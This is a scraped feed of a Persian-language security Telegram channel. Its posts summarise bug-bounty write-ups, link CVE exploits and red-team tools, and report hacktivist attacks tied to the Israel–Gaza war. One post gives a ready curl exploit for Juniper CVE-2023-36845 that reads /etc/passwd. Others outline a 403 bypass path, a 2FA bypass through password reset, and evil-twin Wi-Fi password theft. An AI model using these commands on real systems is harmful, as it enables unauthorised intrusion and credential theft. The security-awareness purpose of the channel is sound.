⭕️ Tricky 2FA Bypass Leads to 4 digit Bounty $$$$
همانطور که میدونید، 2fa همان احراز هویت دو عاملی هست، و برای این استفاده میشه که کاربران رو مجبور کنه قبل از دسترسی به حساب یا سیستم یا اپلیکشن دو فاکتور احراز هویت ارائه بدن.
هکر در این مقاله اول اقدام به ساخت یک حساب کرده و بعد احراز هویت دوعاملی یا 2fa رو فعال کرده و از اکانت خارج شده.
در مرحله بعد به صفحه ی "فراموشی رمز عبور" رفته و رمز عبور اکانت رو ریست کرده و تونسته بدون ارائه 2fa رمز اکانت رو تغییر بده و لاگین کنه.
این اسیب پذیری یک پیکربندی اشتباه سمت سرور هستش، وبسایت برای اینکه رمز اکانت رو تغییر بده باید درخواست 2fa میکرد که اینکارو انجام نداد و باعث این اسیب پذیری شد.
لینک مقاله:
🔗 https://bit.ly/2fa-bypass-sep-2023
#ATO #2FA
@securation
همانطور که میدونید، 2fa همان احراز هویت دو عاملی هست، و برای این استفاده میشه که کاربران رو مجبور کنه قبل از دسترسی به حساب یا سیستم یا اپلیکشن دو فاکتور احراز هویت ارائه بدن.
هکر در این مقاله اول اقدام به ساخت یک حساب کرده و بعد احراز هویت دوعاملی یا 2fa رو فعال کرده و از اکانت خارج شده.
در مرحله بعد به صفحه ی "فراموشی رمز عبور" رفته و رمز عبور اکانت رو ریست کرده و تونسته بدون ارائه 2fa رمز اکانت رو تغییر بده و لاگین کنه.
این اسیب پذیری یک پیکربندی اشتباه سمت سرور هستش، وبسایت برای اینکه رمز اکانت رو تغییر بده باید درخواست 2fa میکرد که اینکارو انجام نداد و باعث این اسیب پذیری شد.
لینک مقاله:
🔗 https://bit.ly/2fa-bypass-sep-2023
#ATO #2FA
@securation
👍9❤1
Forwarded from Yashar Mahmoudnia
_
🦅 تیم امنیت نرم افزار بایت امن | مرجع تخصصی در حوزه باینری
🏳️ برنامه نویسی | تحلیل بدافزار | توسعه آسیب پذیری | مهندسی معکوس | امنیت نرم افزار
🐞 به همراه گروه پرسش و پاسخ و منابع آموزشی
🌐 @SecureByte | Group
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤7👎5👍2
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
GitHub
GitHub - Chocapikk/CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege Vulnerability
Microsoft SharePoint Server Elevation of Privilege Vulnerability - Chocapikk/CVE-2023-29357
🤩12👍3😱2🔥1
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@securation
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@securation
👍5👎1
⭕️اگر به توسعه ابزار های Persistence در ویندوز علاقه مندید ابزاری با زبان C# نوشته شده که امکاناتی دارد.
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@securation
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@securation
GitHub
GitHub - mertdas/RedPersist
Contribute to mertdas/RedPersist development by creating an account on GitHub.
👍11
⭕️ SQL injection to RCE
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLI
@securation
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLI
@securation
👍12❤2
لینک گروه امنیت اطلاعات
T.me/darkpwners
T.me/darkpwners
Telegram
Security Analysis Group
گروه تبادل دانش امنیت اطلاعات
👎9🔥3😁3
⭕️ آسیب پذیری با شناسه ثبت شده CVE-2023-42115 که برای Exim اومده میلیون ها سرور آسیب پذیر که منجر به هک شدن توسط این آسیب پذیری میشه داره.
آسیب پذیری RCE کشف شده فعلا واسش حتی Patch هم نیومده و یا باید دسترسی به سرور رو محدود کرد یا سرور رو خاموش کرد:)
⭕️ نکته مهم :
تصویر ضمیمه شده تعداد بالای آسیب پذیریهای ایران رو نشون میده و باید بزودی منتظر هک شدن کل ایران باشم.
https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/
#0day #Exim #attack #cve
@securation
آسیب پذیری RCE کشف شده فعلا واسش حتی Patch هم نیومده و یا باید دسترسی به سرور رو محدود کرد یا سرور رو خاموش کرد:)
⭕️ نکته مهم :
تصویر ضمیمه شده تعداد بالای آسیب پذیریهای ایران رو نشون میده و باید بزودی منتظر هک شدن کل ایران باشم.
https://www.bleepingcomputer.com/news/security/millions-of-exim-mail-servers-exposed-to-zero-day-rce-attacks/
#0day #Exim #attack #cve
@securation
❤12👍4🔥2👎1
⭕️ فساد و تقلب در حکومت عراق انقدر بالاست که شبیه به رفقای خودشون موقع امتحانات پایان ترم ، اینترنت رو قطع میکنند تا کسی تقلب نکنه!
شمال عراق که مناطق کردنشین هستن اینترنت متصل است.
#فساد #عراق
@securation
شمال عراق که مناطق کردنشین هستن اینترنت متصل است.
#فساد #عراق
@securation
👍26👎14😁4🤩3
⭕️ اگر از ابزار BloodHound استفاده میکنید ابزار جدیدی برای AUDIT اکتیو دایرکتوری با استفاده از آن توسعه داده شده که لیستی از ضعف ها و ریسک هارا در بر گرفته است.
تعدادی از موارد مورد شناسایی این ابزار:
Kerberoastable اکانت ها
AS-REP Roastable اکانت ها
SID history اکانت ها
دسترسی های RDP
دسترسی های ادمین لوکال ADCS
یوزر هایی که دسترسی ادمین دارند
افزایش دسترسی از DC SHADOW به دسترسی های بالاتر
https://github.com/Mazars-Tech/AD_Miner
#RedTeam #AD
@securation
تعدادی از موارد مورد شناسایی این ابزار:
Kerberoastable اکانت ها
AS-REP Roastable اکانت ها
SID history اکانت ها
دسترسی های RDP
دسترسی های ادمین لوکال ADCS
یوزر هایی که دسترسی ادمین دارند
افزایش دسترسی از DC SHADOW به دسترسی های بالاتر
https://github.com/Mazars-Tech/AD_Miner
#RedTeam #AD
@securation
GitHub
GitHub - AD-Security/AD_Miner: AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the…
AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses - AD-Security/AD_Miner
👍13❤1👎1
⭕️ بلومبرگ نوشته نسل بعدی کلاهبرداریها اینطوری خواهد بود که رئیستون باهاتون تماس ویدئویی میگیره و بهتون میگه فوری از حساب شرکت فلان مبلغ درشتو به فلان حساب بریزین. در حالیکه کل تماس با تقلید کامل صدا و رفتار و ظاهر رئیس شما DeepFake و جعلیه.
زمینه ی این اتفاق داره به سرعت شکل میگیره و اتفاقات از این جنس دارن بیشتر و بیشتر میافتن. مثلا سال ٢٠١٩ مدیرعامل یکی از شرکتهای حوزه انرژی تو انگلیس با همین روش فریب خورد و قانع شد ٢۵٠ هزار دلار به حسابی که کلاهبردار که ادعا میکرد یکی از مدیران شرکت بالادستی آلمانیه واریز کنه.
توی این مورد کلاهبرداری اون مدیر بصورت مصنوعی توسط هوش مصنوعی جعل شده بود و چون قربانی اون مدیرو میشناخت، ذرهای به اصالت تماس شک نکرده بود.
https://www.bloomberg.com/news/articles/2023-08-25/deepfake-video-phone-calls-could-be-a-dangerous-ai-powered-scam?leadSource=uverify%20wall
#deepfake #scam #ai
@securation
زمینه ی این اتفاق داره به سرعت شکل میگیره و اتفاقات از این جنس دارن بیشتر و بیشتر میافتن. مثلا سال ٢٠١٩ مدیرعامل یکی از شرکتهای حوزه انرژی تو انگلیس با همین روش فریب خورد و قانع شد ٢۵٠ هزار دلار به حسابی که کلاهبردار که ادعا میکرد یکی از مدیران شرکت بالادستی آلمانیه واریز کنه.
توی این مورد کلاهبرداری اون مدیر بصورت مصنوعی توسط هوش مصنوعی جعل شده بود و چون قربانی اون مدیرو میشناخت، ذرهای به اصالت تماس شک نکرده بود.
https://www.bloomberg.com/news/articles/2023-08-25/deepfake-video-phone-calls-could-be-a-dangerous-ai-powered-scam?leadSource=uverify%20wall
#deepfake #scam #ai
@securation
🔥20👍6😱6😁4
⭕️ Bypassing 403s like a PRO! ($2,100): Broken Access control
در این مقاله هکر روی تارگت مورد نظر ریکان انجام میده و متوجه میشه ک برای یکی از مسیر ها (/console) سرور ارور 403 میده و تصمیم میگیره اون رو بایپس کنه.
متوجه میشه که وبسایت از یک پراکسی برای فوروارد کردن ریکوست ها استفاده میکنه و سعی میکنه با اضافه کردن یه نقطه (. یا انکود شده %2e) پراکسی رو بایپس کنه. (url نهایی: /%2e/console)
در نهایت این تکنیک جواب میده و به اطلاعات حساس و همچنین یک CLI تحت وب دسترسی پیدا میکنه ( RCE ) که باعث میشه اهمیت و تاثیر باگ رو به سطح critical افزایش بده.
باگ سطح P1 تریاژ میشه و 2100 دلار بانتی به هکر تعلق میگیره.
لینک مقاله:
🔗 https://bit.ly/bypass403-oct-10-2023
@securation
#bypass403
در این مقاله هکر روی تارگت مورد نظر ریکان انجام میده و متوجه میشه ک برای یکی از مسیر ها (/console) سرور ارور 403 میده و تصمیم میگیره اون رو بایپس کنه.
متوجه میشه که وبسایت از یک پراکسی برای فوروارد کردن ریکوست ها استفاده میکنه و سعی میکنه با اضافه کردن یه نقطه (. یا انکود شده %2e) پراکسی رو بایپس کنه. (url نهایی: /%2e/console)
در نهایت این تکنیک جواب میده و به اطلاعات حساس و همچنین یک CLI تحت وب دسترسی پیدا میکنه ( RCE ) که باعث میشه اهمیت و تاثیر باگ رو به سطح critical افزایش بده.
باگ سطح P1 تریاژ میشه و 2100 دلار بانتی به هکر تعلق میگیره.
لینک مقاله:
🔗 https://bit.ly/bypass403-oct-10-2023
@securation
#bypass403
👍28🔥2😁1
⭕️ابزاری تحت عنوان KubeHound ایجاد شده که تقریبا شبیه BloodHound اما در محیط Kubernetes فعالیت میکند،که به صورت خوشه ای در Cluster موجود در آن محیط اقدامات زیر را انجام میدهد:
Privilege escalation یا container escape
Lateral Movement
Discovery
Credential Access
https://github.com/DataDog/KubeHound
#RedTeam
@securation
Privilege escalation یا container escape
Lateral Movement
Discovery
Credential Access
https://github.com/DataDog/KubeHound
#RedTeam
@securation
Telegram
Security Analysis
⭕️ اگر از ابزار BloodHound استفاده میکنید ابزار جدیدی برای AUDIT اکتیو دایرکتوری با استفاده از آن توسعه داده شده که لیستی از ضعف ها و ریسک هارا در بر گرفته است.
تعدادی از موارد مورد شناسایی این ابزار:
Kerberoastable اکانت ها
AS-REP Roastable اکانت ها
SID…
تعدادی از موارد مورد شناسایی این ابزار:
Kerberoastable اکانت ها
AS-REP Roastable اکانت ها
SID…
🔥5👍4❤1
⭕️بعد از حملات سایبری گسترده به زیرساخت اسراییل ،اختلالات زیادی در شبکه اینترنت تلآویو گزارش شده است. برخی منابع میگویند این اختلالها عمدی و با هدف محدود کردن اطلاعرسانیها انجام شده است.
#war
@securation
#war
@securation
🔥24👎6👍1
⭕️ ادوارد اسنودن در توییتی کنایه آمیز به نتانیاهو تلاش وی برای توسعه تجارت پرسود فروش جاسوس افزارهای اسراییلی به حکومتهای تمامیت خواه جهت هک گوشیهای فعالان حقوق بشر رو یادآور شد و در پایان به این حقیقت اشاره کرد که گویا این ابزارهای جاسوسی کارایی چندانی جهت جاسوسی از حماس ندارند.
#snowden #israel #war #malware
@securation
#snowden #israel #war #malware
@securation
👍45😁13👎9🔥4❤3
⭕️نرم افزار هشدار حملات هوایی (راکت، موشک، پهپاد و ...) اسرائیل موسوم به «Red Alert» توسط هکرهای طرفدار فلسطین مورد هک قرار گرفته و مختل شده است.
#war #israel #gaza
@securation
#war #israel #gaza
@securation
👎25❤20👍12🔥1
⭕️ آسیب پذیری جدید روی IIS کشف شده با شدت بحرانی که با شناسه ثبت شده ی CVE-2023-36434 درحال استفاده است که طبق روال معمول ایران همه رفتن تعطیلات حماسه ساز تا شنبه خبری از فیکس کردن یا بروزرسانی نیست:)
نقشه ی کشورهای آسیب پذیر رو ببینید ایران 241 هزار سرور IIS مورد نظر استفاده میشه :
https://app.netlas.io/responses/?q=%20http.headers.server%3A%22Microsoft-IIS%22&page=1&indices=&s=35
#news #IIS #Microsoft #0day
@securation
نقشه ی کشورهای آسیب پذیر رو ببینید ایران 241 هزار سرور IIS مورد نظر استفاده میشه :
https://app.netlas.io/responses/?q=%20http.headers.server%3A%22Microsoft-IIS%22&page=1&indices=&s=35
#news #IIS #Microsoft #0day
@securation
🤩8🔥3😁2😱2👎1
⭕️ پیدا کردن رمز عبور Wi-Fi با استفاده از حمله Evil twin
در این مقاله، هکر روشی برای شکستن رمز عبور Wi-Fi به وسیله حمله evil twin رو معرفی میکنه.
با ایجاد نقطه دسترسی جعلی با همان آدرس MAC و ESSID شبکه وای فای قربانی، میتونیم با استفاده از ابزار Airgeddon رمز عبور رو پیدا کنیم.
توجه: این اطلاعات تنها برای اهداف آموزشی و اخلاقی هستش.
لینک مقاله:
🔗 https://bit.ly/Evil-twin-oct-14-23
#Wpa #WiFi
@securation
در این مقاله، هکر روشی برای شکستن رمز عبور Wi-Fi به وسیله حمله evil twin رو معرفی میکنه.
با ایجاد نقطه دسترسی جعلی با همان آدرس MAC و ESSID شبکه وای فای قربانی، میتونیم با استفاده از ابزار Airgeddon رمز عبور رو پیدا کنیم.
توجه: این اطلاعات تنها برای اهداف آموزشی و اخلاقی هستش.
لینک مقاله:
🔗 https://bit.ly/Evil-twin-oct-14-23
#Wpa #WiFi
@securation
👍19👎2🤩2😁1
⭕️ گروه هکتویست CyberAv3ngers ادعا کرده DORAD (نیروگاه دوراد یک نیروگاه در اشکلون اسرائیل ) و همچنین سیستم توزیع سوخت ORPAK Systems را هک کرده است.
#war #israel #gaza
@securation
#war #israel #gaza
@securation
👍24👎14❤5😱2